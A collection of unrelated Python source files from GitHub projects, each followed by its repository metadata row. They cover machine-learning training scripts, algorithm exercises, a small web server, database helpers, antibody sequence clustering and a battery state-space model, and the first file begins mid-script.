train_data = min_max_scaler.fit_transform(train_data)
test_data = min_max_scaler.fit_transform(test_data)
if not args.final:
train_data, eval_data, train_labels, eval_labels = \
train_test_split(train_data, train_labels, random_state=7,
test_size=0.3)
eval_set = [(train_data, train_labels), (eval_data, eval_labels)]
if args.model == "XGBoost":
model = XGBClassifier(learning_rate=0.1, max_depth=5,
min_child_weight=7, n_estimators=1000, nthread=1,
# subsample=0.8, colsample_bytree=0.4,
subsample=0.7,
objective='multi:softprob', num_class=10,
gamma=1)
if args.final:
model.fit(train_data, train_labels,
verbose=True)
else:
model.fit(train_data, train_labels,
eval_metric=["merror", "mlogloss"], eval_set=eval_set,
early_stopping_rounds=10,
verbose=True)
elif args.model == "RandomForest":
model = RandomForestClassifier(bootstrap=True, criterion="entropy",
max_features=0.4, min_samples_leaf=4,
min_samples_split=12, n_estimators=100,
verbose=3, class_weight='balanced')
model.fit(train_data, train_labels)
elif args.model == "SVC":
model = LinearSVC(C=1.0, dual=False, loss="squared_hinge", penalty="l1",
tol=1e-4, verbose=3)
# LinearSVC doesn't implement predict_proba on its own, so wrap it
model = CalibratedClassifierCV(model)
model.fit(train_data, train_labels)
elif args.model == "KNN":
model = KNeighborsClassifier(n_neighbors=args.neighbors)
model.fit(train_data, train_labels)
results = model.predict(test_data) # Predicts from 1-10
results_proba = model.predict_proba(test_data)
kfold = StratifiedKFold(n_splits=3, random_state=7)
scores = cross_val_score(model, train_data, train_labels,
cv=kfold, scoring="neg_log_loss")
accuracy_scores = cross_val_score(model, train_data, train_labels,
cv=kfold, scoring="accuracy")
print("Cross validation logloss scores: {:.5f}[{:.5f}]*"
.format(np.mean(scores), np.std(scores)))
print("Cross validation accuracy scores: {:.5f}[{:.5f}]*"
.format(np.mean(accuracy_scores), np.std(accuracy_scores)))
is_final = "FINAL_" if args.final else ""
uid = "{}{}_scaled={}_drop={}_remarks={}".format(
is_final, args.model,
args.scale, args.drop,
args.remarks or args.neighbors)
if not args.final:
eval_predicted_proba = model.predict_proba(eval_data)
eval_predicted = model.predict(eval_data)
# Splits into classes from 0-10 (11 classes)
onehot = to_categorical(eval_labels).astype(int)
eval_onehot = onehot[:, 1:] # Trim unnecessary first column (class "0")
ll = log_loss(eval_onehot, eval_predicted_proba)
acc = accuracy_score(eval_labels, eval_predicted)
print("Validation log-loss and accuracy: {:.5f} {:.5f}".format(ll, acc))
# Plot
if args.model in ["XGBoost"]:
train_metrics = model.evals_result()['validation_0']
test_metrics = model.evals_result()['validation_1']
epochs = len(train_metrics['merror'])
x_axis = range(0, epochs)
# plot log loss
fig, ax = plt.subplots()
ax.plot(x_axis, train_metrics['mlogloss'], label='Train')
ax.plot(x_axis, test_metrics['mlogloss'], label='Test')
ax.legend()
plt.ylabel('Log Loss')
plt.title('{} - Log Loss'.format(args.model))
plt.savefig("img/logloss_{}.png".format(uid))
plt.show()
# plot classification error
fig, ax = plt.subplots()
ax.plot(x_axis, train_metrics['merror'], label='Train')
ax.plot(x_axis, test_metrics['merror'], label='Test')
ax.legend()
plt.ylabel('Error')
plt.title('{} - Error'.format(args.model))
plt.savefig("img/error_{}.png".format(uid))
plt.show()
# Confusion matrix
plot_confusion_matrix(eval_predicted, eval_labels, args.model, uid)
# AUC ROC scores
compute_AUC_scores(eval_predicted_proba, eval_labels)
# Save Kaggle submission files
construct_kaggle_submissions(uid, results, results_proba)
model_file = open("models/{}.mdl".format(uid), "wb")
pickle.dump(model, model_file)
| christabella/music-genre-classification | classifiers.py | classifiers.py | py | 6,740 | python | en | code | 0 | github-code | 13 |
21254109776 | class Solution:
# @param A : list of list of integers
# @param B : integer
# @return an integer
def solve(self, A, B):
n = len(A)
m = len(A[0])
h = []
for i in range(n):
for j in range(m):
if len(h) < B:
h.append(A[i][j])
continue
self.buildMaxHeap(h, len(h))
self.insert(h, A[i][j])
return h[0]
def buildMaxHeap(self, A, n):
start = (n - 2) // 2
for i in range(start, -1, -1):
self.heapify(A, n, i)
def insert(self, A, num):
if num < A[0]:
A[0] = num
def heapify(self, A, n, i):
while i < n:
largest = i
left = i * 2 + 1
right = i * 2 + 2
if left < n and A[left] > A[largest]:
largest = left
if right < n and A[right] > A[largest]:
largest = right
if largest == i:
break
A[largest], A[i] = A[i], A[largest]
i = largest
print(Solution().solve(
[
[6, 9, 13, 14, 18, 21, 25],
[9, 11, 15, 18, 22, 24, 26],
[10, 13, 18, 21, 25, 28, 31],
[12, 15, 22, 24, 26, 31, 32],
[16, 17, 25, 28, 32, 34, 35]
], 10))
| sundar91/dsa | Heap/Bth-smallest-element.py | Bth-smallest-element.py | py | 1,329 | python | en | code | 0 | github-code | 13 |
74429731217 | import Preprocess as pp
import re
import nltk
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import numpy as np
def reviewsToWords(review):
letters_only = re.sub("[^a-zA-Z]", # The pattern to search for
" ", # The pattern to replace it with
review) # The text to search
lower_case = letters_only.lower() #Converts to lower case
words = lower_case.split() #Splits into seperate words
stops = set(stopwords.words("english"))
wordsOfReview = [w for w in words if not w in stops] #Removes un-useful words (stops)
returnValue = ( " ".join(wordsOfReview)) #Joins together words with space
return returnValue
def performPrediction(dataset):
# Size of training dataset 1
no_of_reviews = 14175
# Cleaned reviews
cleaned_reviews = []
# Puts cleaned dataset to new array cleaned_reviews
print("Processing...")
for i in xrange(0, no_of_reviews):
cleaned_reviews.append(reviewsToWords(dataset["content"][i]))
bag = CountVectorizer(analyzer="word",
tokenizer=None,
preprocessor=None,
stop_words=None,
max_features=3000)
# Fit_transform learns the vocabulary
trained_Data = bag.fit_transform(cleaned_reviews)
# Convert to Numpy array
train_data_features = trained_Data.toarray()
# Random forest classifier with 100 trees
forest = RandomForestClassifier(n_estimators=100)
#Fit the train data with recommended values
forest = forest.fit(train_data_features, dataset["recommended"][0:14175])
###################################TESTING PART#######################################
print("Testing....")
# Number of reviews
num_reviews = len(dataset["content"])
#New array with cleaned testing reviews
clean_test_reviews = []
count_pos = 0
count_neg = 0
for i in xrange(14175, num_reviews):
if(dataset["recommended"][i] == 1):
count_pos+=1
else:
count_neg += 1
clean_review = reviewsToWords(dataset["content"][i])
clean_test_reviews.append(clean_review)
# Get a bag of words for the test set, and convert to a numpy array
test_data_features = bag.transform(clean_test_reviews)
test_data_features = test_data_features.toarray()
# Use the random forest to make sentiment label predictions
result = forest.predict(test_data_features)
# Copy the results to a pandas dataframe with an "content" column and
# a "recommended" column
output = pd.DataFrame(data={"content": dataset["content"][14175:], "recommended": result})
print("Pos total %s" %count_pos)
print("Neg total %s" %count_neg)
return output
def performBagOfWords():
#Gets data from preprocess
dataset = pp.getData()
#TODO Downloads languages
#nltk.download()
result = performPrediction(dataset)
#If reccomended print
counter_pos = 0
for index, row in result.iterrows():
if(row['recommended'] == 1):
#print(row['content'], row['recommended'])
counter_pos+=1
print("Recommended in total %d" % counter_pos)
counter_neg = 0
for index, row in result.iterrows():
if(row['recommended'] == 0):
#print(row['content'], row['recommended'])
counter_neg+=1
print("NOT Recommended in total %d" % counter_neg)
return
| Eimisas/Sentimental-analysis | Code/Random forest/BagOfWords.py | BagOfWords.py | py | 3,613 | python | en | code | 0 | github-code | 13 |
9368008419 | import asyncio
import aiohttp_cors
from aiohttp import web
from routes import setup_routes
from settings import load_configuration
def set_cors(app):
# Configure default CORS settings.
cors = aiohttp_cors.setup(app, defaults={
"*": aiohttp_cors.ResourceOptions(
allow_credentials=True,
expose_headers=("X-Custom-Server-Header",),
allow_headers=("X-Requested-With", "Content-Type"),
)
})
# Configure CORS on all routes.
for route in list(app.router.routes()):
cors.add(route)
def add_prefix(app, prefix: str):
# add prefix to all path in app's routes
for resource in app.router.resources():
resource.add_prefix(prefix)
# print(resource.get_info())
# print(resource.canonical)
def main():
# load configurations
config = load_configuration('./config.yml')
# create web instance
app = web.Application()
# setup routes
setup_routes(app, config)
# add route prefix
add_prefix(app, '/relaxion')
# config CORS
set_cors(app)
web.run_app(app, host=config['host'], port=config['port'])
if __name__ == '__main__':
main() | jindada1/Relaxion | main.py | main.py | py | 1,199 | python | en | code | 5 | github-code | 13 |
10511718601 | from mod_python import apache, Session
from mod_python import util
from xml.dom.minidom import getDOMImplementation, parse, parseString
import urllib
#tutkitaan, onko sivulle tulija kirjautunut vai ei
#näytetään kirjautumissivu, jos ei
def handler(req):
try:
if req.session["kirjautunut"] == "ok":
return apache.OK
except:
f = urllib.urlopen("http://users.jyu.fi/~helireki/wsovellukset15/demo4/kirjaudu.html")
pohja = f.read()
dom1 = parseString(pohja)
form = util.FieldStorage(req)
tunnus = form.getfirst("tunnus")
salasana = form.getfirst("salasana")
if tunnus == "tiea218@foo.example" and salasana == "salasana":
req.session["kirjautunut"] = "ok"
req.session.save()
return apache.OK
req.content_type = "text/html ;charset=utf-8"
bodi = dom1.getElementsByTagName("body")[0]
viesti = ""
if form.getfirst("kirjaudu") == "Kirjaudu":
if tunnus != "tiea218@foo.example":
viesti = "Käyttäjätunnusta ei löytynyt. "
elif salasana != "salasana":
viesti += "Käyttäjätunnus oli oikea, mutta salasana väärä. "
p = dom1.createElement("p")
viesti += "Syötä tunnus ja salasana uudelleen."
p.appendChild(dom1.createTextNode(viesti.decode("UTF-8")))
bodi.appendChild(p)
req.write(dom1.toxml("UTF-8"))
return apache.DONE
| helireki/TIEA218-15 | demo4/autentikointi.py | autentikointi.py | py | 1,500 | python | fi | code | 0 | github-code | 13 |
41149702163 | # Third-party libraries
import os
import numpy as np
# Set paths to folders
def set_paths():
# Path to the output folder
work_dir = '../work/'
if not os.path.exists(work_dir):
sys.exit('WORKING FOLDER DOES NOT EXIST!')
# Path to the data directory
data_dir = work_dir + 'data/'
if not os.path.exists(data_dir):
sys.exit('FOLDER WITH DATA DOES NOT EXIST!')
# Path to the figures directory
fig_dir = work_dir + 'fig/'
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
os.makedirs(fig_dir + 'train/')
os.makedirs(fig_dir + 'train/split/')
os.makedirs(fig_dir + 'valid/')
os.makedirs(fig_dir + 'valid/split/')
os.makedirs(fig_dir + 'test/')
os.makedirs(csv_dir + 'test/init/')
print('FOLDERS FOR FIGURES WERE CREATED!')
# Path to .csv files directory
csv_dir = work_dir + 'csv/'
if not os.path.exists(csv_dir):
os.makedirs(csv_dir)
os.makedirs(csv_dir + 'train/')
os.makedirs(csv_dir + 'valid/')
os.makedirs(csv_dir + 'test/')
print('FOLDERS FOR .CSV FILES WERE CREATED!')
# Path to the tecplot directory
tec_dir = work_dir + 'tec/'
if not os.path.exists(tec_dir):
os.makedirs(tec_dir)
os.makedirs(tec_dir + 'train/')
os.makedirs(tec_dir + 'valid/')
os.makedirs(tec_dir + 'test/')
print('FOLDERS FOR TECPLOT FILES WERE CREATED!')
# Path to the saved model directory
nn_dir = work_dir + 'nn/'
if not os.path.exists(nn_dir):
os.makedirs(nn_dir)
print('FOLDER FOR NN FILES WAS CREATED!')
return work_dir, data_dir, fig_dir, csv_dir, tec_dir, nn_dir
# Fields output for tecplot
def write_tec_var(n, var1, var2, x, y, time, res_plt, var_name1, var_name2):
var1 = np.transpose(var1)
var2 = np.transpose(var2)
res_plt.write('title="fields" variables="x" "y" "' + var_name1 + '"' + ' "' + var_name2 + '" \n')
res_plt.write('zone t="time=' + str(time) + '" i=' + str(n) + ' j=' + str(n) + ' f=block')
# x grid
for i in range(0,n):
res_plt.write("\n")
for j in range(0,n):
res_plt.write("%.12f" % x[i] + " ")
# y grid
for i in range(0,n):
res_plt.write("\n")
for j in range(0,n):
res_plt.write("%.12f" % y[j] + " ")
# var
for i in range(0,n):
res_plt.write("\n")
for j in range(0,n):
res_plt.write("%.12f" % var1[i, j] + " ")
for i in range(0,n):
res_plt.write("\n")
for j in range(0,n):
res_plt.write("%.12f" % var2[i, j] + " ")
res_plt.write("\n")
| aiskhak/NN_PDE | CS1/inout.py | inout.py | py | 2,751 | python | en | code | 0 | github-code | 13 |
39575906903 | my_array = []
def helper(n, target, index, temp_arr, temp_sum):
# print(temp_sum, temp_arr)
if temp_sum == target:
my_array.append(temp_arr.copy())
return
if index == len(n):
return
if temp_sum > target:
return
temp_arr.append(n[index])
temp_sum += n[index]
helper(n, target, index, temp_arr, temp_sum)
temp_arr.pop()
temp_sum -= n[index]
helper(n, target, index+1, temp_arr, temp_sum)
def combSum(ARR, B):
# Write your code here
# Return a list of sorted lists/combinations
global my_array
my_array = []
helper(ARR, B, 0, [], 0)
# print(my_array)
my_array = list(map(sorted, my_array))
# print(temp)
# my_array = [sorted(x, key=lambda x: x[0]) for x in my_array]
return my_array
print(combSum([3, 2, 1], 5))
| KillerStrike17/CP-Journey | Codein10/BackTracking/Combination_sum_II.py | Combination_sum_II.py | py | 841 | python | en | code | 0 | github-code | 13 |
29208173553 | '''
Python module dependencies:
biopython==1.63
fastcluster==1.1.13
numpy==1.7.1
python-Levenshtein==0.11.2
scipy==0.12.0
Under Ubuntu, scipy, numpy and biopython can be installed as:
sudo apt-get install python-biopython python-numpy python-scipy
fastcluster and python-Levenshtein can be installed using pip:
pip install fastcluster python-Levenshtein
'''
from __future__ import print_function
import time
import math
import json
import numpy as np
from multiprocessing import Pool, cpu_count
import fastcluster as fc
from Bio import pairwise2
from Levenshtein import distance
from scipy.cluster.hierarchy import fcluster
import subprocess
import os
import resource
default_dtype = 'f4'
distance_cutoff = 0.32
class Seq(object):
"""Contains genetic characteristics for a single sequence.
Input:
data = a MongoDB result (dict-like) containing the following fields:
[seq_id, v_gene, j_gene, <junc_query>, var_muts_nt]
where <junc_query> is the sequence of the nucleotide or AA junction.
junc_query = either 'junc_aa' or 'junc_nt' for nucleotide or AA junctions, respectively.
"""
def __init__(self, data, junc_query):
self.id = data['seq_id']
self.v_fam = data['v_gene']['fam']
self.v_gene = data['v_gene']['gene']
self.v_all = data['v_gene']['all']
self.j_gene = data['j_gene']['gene']
self.j_all = data['j_gene']['all']
self.junc = data[junc_query]
self.junc_len = len(self.junc)
self.muts = []
if 'var_muts_nt' in data.keys():
self.muts = data['var_muts_nt']['muts']
def v_gene_string(self):
return 'v{0}-{1}'.format(self.v_fam, self.v_gene)
def v_fam_string(self):
return 'v{0}'.format(self.v_fam)
def get_LD(i, j):
'''Calculate sequence distance between a pair of Seq objects'''
# pairwise2 is used to force 'gapless' distance when sequence pair is of the same length
if i.junc_len == j.junc_len:
identity = pairwise2.align.globalms(i.junc, j.junc, 1, 0, -50, -50, score_only=True, one_alignment_only=True)
return i.junc_len - identity
# Levenshtein distance is used for sequence pairs of different lengths
else:
return distance(i.junc, j.junc)
def vCompare(i, j):
'''Calculate penalty for mismatches in Variable segment.'''
if i.v_gene != j.v_gene:
return 8
if i.v_all != j.v_all:
return 1
return 0
def jCompare(i, j):
'''Calculate penalty for mismatches in Joining segment.'''
if i.j_gene != j.j_gene:
return 8
if i.j_all != j.j_all:
return 1
return 0
def sharedMuts(i, j):
'''Calculate bonus for shared mutations.'''
if i.id == j.id:
return 0.0
bonus = 0.0
for mut in i.muts:
if mut == '':
continue
if mut in j.muts:
bonus += 0.35
return bonus
def get_score(i, j=None):
if j is None:
i, j = i
if i.id == j.id:
return 0.0
LD = get_LD(i, j)
vPenalty = vCompare(i, j)
jPenalty = jCompare(i, j)
lenPenalty = math.fabs(i.junc_len - j.junc_len) * 2
editLength = min(i.junc_len, j.junc_len)
mutBonus = sharedMuts(i, j)
if mutBonus > (LD + vPenalty + jPenalty):
mutBonus = (LD + vPenalty + jPenalty - 0.001) # distance values can't be negative
return (LD + vPenalty + jPenalty + lenPenalty - mutBonus) / editLength
def make_iter(seqs, mode=1):
for i, seq_i in enumerate(seqs):
if mode == 1:
for seq_j in seqs[i + 1:]:
yield (seq_i, seq_j)
else:
yield (seq_i, seqs[i + 1:])
def get_scores_one_row(args):
(seq_i, row_j) = args
return np.array([get_score(seq_i, seq_j) for seq_j in row_j], dtype=default_dtype)
def build_condensed_matrix(seqs, mode=2):
result = np.array([], dtype=default_dtype)
p = Pool(processes=cpu_count())
if mode == 1:
n = len(seqs)
#chunksize = 500000
chunksize = int(n * (n - 1) / 2 / cpu_count() / 2)
result_one = p.imap(get_score, make_iter(seqs, mode=1), chunksize=chunksize)
result = np.array(list(result_one), dtype=default_dtype)
else:
result_one_row = p.imap(get_scores_one_row, make_iter(seqs, mode=2), chunksize=100)
result = np.concatenate(list(result_one_row))
#p.close()
#p.join()
return result
def build_cluster_dict(flatCluster):
clusters = {}
for i, c in enumerate(flatCluster):
if c in clusters:
clusters[c].append(i)
else:
clusters[c] = [i]
return clusters
def make_clusters(con_distMatrix):
linkageMatrix = fc.linkage(con_distMatrix, method='average', preserve_input=False)
del con_distMatrix
flatCluster = fcluster(linkageMatrix, distance_cutoff, criterion='distance')
del linkageMatrix
return flatCluster
def write_output(outfile, clusters, seqs, vh='v0'):
with open(outfile, 'w') as out_f:
for c in clusters.keys():
if len(clusters[c]) < 2:
continue
rString = "#lineage_{0}_{1}\n".format(vh, str(c))
for seq_idx in clusters[c]:
seq = seqs[seq_idx]
rString += '>{0}\n{1}\n'.format(seq.id, seq.junc)
rString += '\n'
out_f.write(rString)
def get_memery_usage():
rss = subprocess.check_output('ps -p {} u'.format(os.getpid()), shell=True).decode('utf-8').split('\n')[1].split()[5]
max_rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
print('current_rss: {}\tmax_rss: {}'.format(rss, max_rss))
def analyze(infile, outfile=None, n=None, output_format='cluster_only', memory_usage=False):
if memory_usage:
get_memery_usage()
t00 = time.time()
print("Loading input sequences...", end='')
with open(infile) as in_f:
seqs = json.load(in_f)
if n:
seqs = seqs[:n]
seqs = [Seq(s, 'junc_aa') for s in seqs]
print("done. [{}, {:.2f}s]".format(len(seqs), time.time() - t00))
if memory_usage:
get_memery_usage()
t0 = time.time()
print("Calculating condensed distance matrix...", end='')
con_distMatrix = build_condensed_matrix(seqs, mode=2) # ####
print("done. [{}, {:.2f}s]".format(con_distMatrix.shape, time.time() - t0))
print("\tmin: {}, max: {}".format(con_distMatrix.min(), con_distMatrix.max()))
if memory_usage:
get_memery_usage()
t0 = time.time()
print("Calculating clusters...", end='')
clusters = make_clusters(con_distMatrix)
print("done. [{}, {:.2f}s]".format(clusters.max(), time.time() - t0))
if memory_usage:
get_memery_usage()
t0 = time.time()
print ("Outputting clusters...", end='')
if output_format == 'seqs':
clusters = build_cluster_dict(clusters)
write_output(outfile, clusters, seqs)
else:
np.savetxt(outfile, clusters, fmt='%d')
print("done. {:.2f}s".format(time.time() - t0))
print('=' * 20)
print("Finished! Total time= {:.2f}s".format(time.time() - t00))
if memory_usage:
get_memery_usage()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Clonify script.')
parser.add_argument('infile', action="store", help='input sequence file')
parser.add_argument('outfile', action="store", help='output file')
parser.add_argument('-n', action="store", dest="n", type=int,
help='maximum number of sequences to process from input file')
parser.add_argument('-f', action='store', dest='output_format', default='cluster_only',
help='output format: cluster_only | seqs.')
parser.add_argument('-m', action='store_true', dest='memory_usage',
help='print out memeory useage')
args = parser.parse_args()
analyze(args.infile, args.outfile, n=args.n,
output_format=args.output_format,
memory_usage=args.memory_usage)
| SuLab/Antibody-Clustering-Challenge | original_python_code.py | original_python_code.py | py | 8,052 | python | en | code | 1 | github-code | 13 |
11069452254 | from bson import ObjectId
import uuid
import sqlalchemy as db
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship, synonym
__all__ = [
'MongoReference',
'MongoEmbedded',
'MongoEmbeddedList',
'Base',
'UserBase',
]
def MongoReference(field, ref_cls, queryset=None):
"""
SQLA field that represents a reference to a MongoEngine document.
The value is cached until an assignment is made.
To use a custom QuerySet (instead of the default `ref_cls.objects`),
pass it as the `queryset` kwarg. You can also pass a function that
resolves to a QuerySet.
"""
def _resolve_queryset():
if queryset is None:
return ref_cls.objects
else:
return queryset()
def _get(obj):
qs = _resolve_queryset()
if not hasattr(obj, '_%s__cache' % field):
ref_id = getattr(obj, field)
if ref_id is None:
ref = None
else:
ref = qs.get(pk=ref_id)
setattr(obj, '_%s__cache' % field, ref)
return getattr(obj, '_%s__cache' % field)
def _set(obj, val):
if hasattr(obj, '_%s__cache' % field):
delattr(obj, '_%s__cache' % field)
if isinstance(val, ref_cls):
val = val.pk
if isinstance(val, ObjectId):
val = str(val)
setattr(obj, field, val)
return synonym(field, descriptor=property(_get, _set))
def MongoEmbedded(field, emb_cls):
"""
SQLA field that represents a MongoEngine embedded document.
Converts the JSON value to/from an EmbeddedDocument. Note that a new
instance is returned every time we access and we must reassign any changes
back to the model.
"""
def _get(obj):
return emb_cls._from_son(getattr(obj, field))
def _set(obj, val):
setattr(obj, field, val.to_mongo())
return synonym(field, descriptor=property(_get, _set))
def MongoEmbeddedList(field, emb_cls):
"""SQLA field that represents a list of MongoEngine embedded documents."""
def _get(obj):
return [emb_cls._from_son(item) for item in getattr(obj, field)]
def _set(obj, val):
setattr(obj, field, [item.to_mongo() for item in val])
return synonym(field, descriptor=property(_get, _set))
# From https://code.launchpad.net/~stefanor/ibid/sqlalchemy-0.6-trunk/+merge/66033
class PGSQLModeListener(object):
def connect(self, dbapi_con, con_record):
c = dbapi_con.cursor()
c.execute("SET TIME ZONE UTC")
c.close()
class Base(object):
id = db.Column(UUID, default=lambda: str(uuid.uuid4()), primary_key=True)
created_at = db.Column(db.DateTime(), default=db.func.now())
updated_at = db.Column(
db.DateTime(), default=db.func.now(), onupdate=db.func.now()
)
@property
def pk(self):
return self.id
__mapper_args__ = {'order_by': db.desc('updated_at')}
class UserBase(Base):
created_by_id = declared_attr(
lambda cls: db.Column(
UUID, db.ForeignKey('user.id'), default=cls._get_current_user
)
)
created_by = declared_attr(
lambda cls: relationship(
'User', primaryjoin='%s.created_by_id == User.id' % cls.__name__
)
)
updated_by_id = declared_attr(
lambda cls: db.Column(
UUID,
db.ForeignKey('user.id'),
default=cls._get_current_user,
onupdate=cls._get_current_user,
)
)
updated_by = declared_attr(
lambda cls: relationship(
'User', primaryjoin='%s.updated_by_id == User.id' % cls.__name__
)
)
@classmethod
def _get_current_user(cls):
return None
| closeio/flask-common | flask_common/db.py | db.py | py | 3,814 | python | en | code | 26 | github-code | 13 |
70730835219 | W_str = r"W" + r"\rightarrow" + r"l" + r"\nu_{l}"
Z_str = r"Z" + r"\rightarrow" + r"l^{+}" + r"l^{-}"
ttbar_str = r"t" + r"\bar{t}"
config = {
"Luminosity": 10064,
"InputDirectory": "results",
"Histograms" : {
"WtMass" : {},
"etmiss" : {},
"lep_n" : {},
"lep_pt" : {},
"lep_eta" : {},
"lep_E" : {},
"lep_phi" : {"y_margin" : 0.6},
"lep_charge" : {"y_margin" : 0.6},
"lep_type" : {"y_margin" : 0.5},
"lep_ptconerel30" : {},
"lep_etconerel20" : {},
"lep_d0" : {},
"lep_z0" : {},
"n_jets" : {},
"jet_pt" : {},
"jet_eta" : {},
"jet_MV2c10" : {"y_margin" : 0.3},
},
"Paintables": {
"Stack": {
"Order" : ["Diboson", "W", "Z", "stop", "ttbar"],
"Processes" : {
"Diboson" : {
"Color" : "#fa7921",
"Contributions" : ["WWlvlv", "WZlvll", "WZlvvv", "ZZllll", "ZZvvll", "WWlvqq", "WZqqll", "WZlvqq", "ZZqqll"]},
"W": {
"Color" : "#e55934",
"Contributions" : ["Wplusenu", "Wplusmunu", "Wplustaunu", "Wminusenu", "Wminusmunu", "Wminustaunu"]},
"Z": {
"Color" : "#086788",
"Contributions" : ["Zee", "Zmumu", "Ztautau"]},
"stop": {
"Color" : "#fde74c",
"Contributions" : ["single_top_tchan", "single_antitop_tchan", "single_top_wtchan", "single_antitop_wtchan", "single_top_schan", "single_antitop_schan"]},
"ttbar": {
"Color" : "#9bc53d",
"Contributions" : ["ttbar_lep"]}
}
},
"data" : {
"Contributions": ["dataA_1lep.root", "dataB_1lep.root", "dataC_1lep.root", "dataD_1lep.root" ]}
},
"Depictions": {
"Order": ["Main", "Data/MC"],
"Definitions" : {
"Data/MC": {
"type" : "Agreement",
"Paintables" : ["data", "Stack"]
},
"Main": {
"type" : "Main",
"Paintables": ["Stack", "data"]
},
}
},
}
| jegarcian/hep-ml | createImages/Configurations/PlotConf_TTbarAnalysis.py | PlotConf_TTbarAnalysis.py | py | 2,385 | python | en | code | 0 | github-code | 13 |
21521017043 | from model import kwsmodel
import os
import tensorflow as tf
from tqdm import tqdm
from tensorflow.keras import optimizers
from dataloader import train_iterator
from utils import *
def train_step(model, images, labels, optimizer):
with tf.GradientTape() as tape:
prediction = model(images, training=True)
cross_entropy = tf.keras.losses.categorical_crossentropy(labels, prediction)
cross_entropy = tf.reduce_mean(cross_entropy)
l2 = l2_loss(model)
loss = cross_entropy + l2
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
return loss, prediction
def train(model, data_iterator, optimizer):
bs = 4
for i in tqdm(range(int(132 / bs))):
images, labels = data_iterator.next()
ce, prediction = train_step(model, images, labels, optimizer)
correct_num = correct_num_batch(labels, prediction)
print('loss: {:.6f}, accuracy: {:.4f}'.format(ce, correct_num / bs))
class CosineDecayWithWarmUP(tf.keras.experimental.CosineDecay):
def __init__(self, initial_learning_rate, decay_steps, alpha=0.0, warm_up_step=0, name=None):
self.warm_up_step = warm_up_step
super(CosineDecayWithWarmUP, self).__init__(initial_learning_rate=initial_learning_rate,
decay_steps=decay_steps,
alpha=alpha,
name=name)
@tf.function
def __call__(self, step):
if step <= self.warm_up_step:
return step / self.warm_up_step * self.initial_learning_rate
else:
return super(CosineDecayWithWarmUP, self).__call__(step - self.warm_up_step)
if __name__ == '__main__':
train_data_iterator = train_iterator()
model = kwsmodel(dim0=4)
model.build(input_shape=(None,) + (64, 40, 1))
# model.load_weights('./h5/kws-l2-mixup-14.h5')
# model = tf.keras.models.load_model("./h5/hand-198.h5")
model.summary()
# optimizer = optimizers.SGD(learning_rate=0.0001, momentum=0.9)
optimizer = optimizers.Adam()
from test import test
for epoch_num in range(100):
train(model, train_data_iterator, optimizer)
if epoch_num % 1 == 0:
with open('test_log_3x3_7k.txt', 'a') as f:
test(model, f)
model.save('./h5/kws-7k-mixup-64-3x3-%s.h5' % epoch_num, save_format='h5')
| yuyun2000/kws | train.py | train.py | py | 2,599 | python | en | code | 1 | github-code | 13 |
29188020072 | import numpy as np
class StateSpace:
# Classical canonical state space time simulation
def __init__(self, n=0, p=0, q=0):
self.n = n
self.p = p
self.q = q
self.u = np.zeros(shape=p)
self.A = np.zeros(shape=(n, n))
self.B = np.zeros(shape=(n, p))
self.C = np.zeros(shape=(q, n))
self.D = np.zeros(shape=(q, p))
self.y = np.zeros(shape=q)
self.x = np.zeros(shape=n)
self.x_dot = self.x
self.x_past = self.x
self.dt = 0.
self.saved = Saved(n, p, q)
def __str__(self, prefix=''):
"""Returns representation of the object"""
s = prefix + "StateSpace:\n"
s += " A = \n {}\n".format(self.A)
s += " x = {}\n".format(self.x)
s += " B = \n {}\n".format(self.B)
s += " u = {}\n".format(self.u)
s += " C = \n {}\n".format(self.C)
s += " D = \n {}\n".format(self.D)
s += " x_dot = {}\n".format(self.x_dot)
return s
def calc_x_dot(self, u):
self.u = u
self.x_dot = self.A @ self.x + self.B @ self.u
# Ax = self.A@self.x
# Bu = self.B@self.u
def init_state_space(self, x_init):
self.x = np.array(x_init)
self.x_past = self.x
self.x_dot = self.x * 0.
def save(self, time):
self.saved.time = np.append(self.saved.time, time)
self.saved.u = np.append(self.saved.u, self.u.reshape(1,2), axis=0)
self.saved.y = np.append(self.saved.y, self.y)
self.saved.x = np.append(self.saved.x, self.x.reshape(1,2), axis=0)
self.saved.x_dot = np.append(self.saved.x_dot, self.x_dot.reshape(1,2), axis=0)
self.saved.x_past = np.append(self.saved.x_past, self.x_past.reshape(1,2), axis=0)
def update(self, dt):
if dt is not None:
self.dt = dt
self.x_past = self.x # Backwards Euler has extra delay
self.x += self.x_dot * self.dt
self.y = self.C @ self.x_past + self.D @ self.u # uses past (backward Euler)
return self.y
class Saved:
# For plot savings. A better way is 'Saver' class in pyfilter helpers and requires making a __dict__
def __init__(self, n=0, p=0, q=0):
self.time = np.zeros(shape=1)
self.n = n
self.p = p
self.q = q
self.u = np.zeros(shape=(1,p))
self.y = np.zeros(shape=q)
self.x = np.zeros(shape=(1,n))
self.x_dot = self.x
self.x_past = self.x
if __name__ == '__main__':
import sys
import doctest
doctest.testmod(sys.modules['__main__'])
def construct_state_space_monitor():
r0 = 0.003 # Randles R0, ohms
tau_ct = 0.2 # Randles charge transfer time constant, s (=1/Rct/Cct)
rct = 0.0016 # Randles charge transfer resistance, ohms
tau_dif = 83 # Randles diffusion time constant, s (=1/Rdif/Cdif)
r_dif = 0.0077 # Randles diffusion resistance, ohms
c_ct = tau_ct / rct
c_dif = tau_dif / r_dif
print('-1/Rc/Cc=', -1/tau_ct, '-1/Rd/Cd=', -1/tau_dif)
print('1/Cc=', 1/c_ct, '1/Cd=', 1/c_dif)
print('r0=', r0)
a = np.array([[-1 / tau_ct, 0],
[0, -1 / tau_dif]])
b = np.array([[1 / c_ct, 0],
[1 / c_dif, 0]])
c = np.array([-1., -1])
d = np.array([-r0, 1])
return a, b, c, d
def construct_state_space_model():
r0 = 0.003 # Randles R0, ohms
tau_ct = 0.2 # Randles charge transfer time constant, s (=1/Rct/Cct)
rct = 0.0016 # Randles charge transfer resistance, ohms
tau_dif = 83 # Randles diffusion time constant, s (=1/Rdif/Cdif)
r_dif = 0.0077 # Randles diffusion resistance, ohms
c_ct = tau_ct / rct
c_dif = tau_dif / r_dif
